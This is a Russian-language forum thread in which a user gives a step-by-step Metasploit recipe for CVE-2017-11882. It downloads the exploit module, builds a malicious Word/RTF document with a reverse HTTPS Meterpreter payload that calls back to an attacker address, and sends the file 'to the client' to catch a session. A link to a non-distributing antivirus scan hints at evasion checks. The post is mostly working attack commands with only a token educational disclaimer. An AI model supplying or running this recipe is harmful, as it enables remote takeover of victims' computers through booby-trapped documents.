Загрузка...

Meterpreter сессия с документа MS Word

Тема в разделе Kali Linux создана пользователем D108 11 дек 2017. 604 просмотра

Загрузка...
  1. D108
    D108 Автор темы 11 дек 2017 Заблокирован(а) 0 18 сен 2017
    Сегодня речь пойдёт о эксплоите CVE-2017-11882 MS Word Metasploit
    с помощью которого мы будем получать meterpreter сессию с документа MS Word

    Скачаем и перенесём эсплоит
    wget https://raw.githubusercontent.com/r...loits/windows/fileformat/office_ms17_11882.rb

    cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

    Запускаем metasploit и выбираем наш модуль.
    service postgresql start
    msfconsole
    use exploit/windows/fileformat/office_ms17_11882

    Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
    set FILENAME /root/exp.doc
    (Можно поставить и *.rtf, отработает и так и так.)

    Добавляем пейлоад и запускаем
    set payload windows/meterpreter/reverse_https
    set lhost 192.168.0.100 (адрес атакующего)
    set lport 4444(как обычно, можете выбирать почти любой)
    exploit

    Собственно, всё.
    Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
    Запускаем, ловим сессию.

    [IMG]

    К сожалению AV так же не стоит на месте
    https://nodistribute.com/result/BUZqx1mACKldLr3

    P.S.моя первая статья ,не судите строго.
     
  2. HitmanAleks
    HitmanAleks 12 дек 2017 Заблокирован(а) 5 25 фев 2017
    Этот путь не на всех дистрах одинаковый окда
     
Top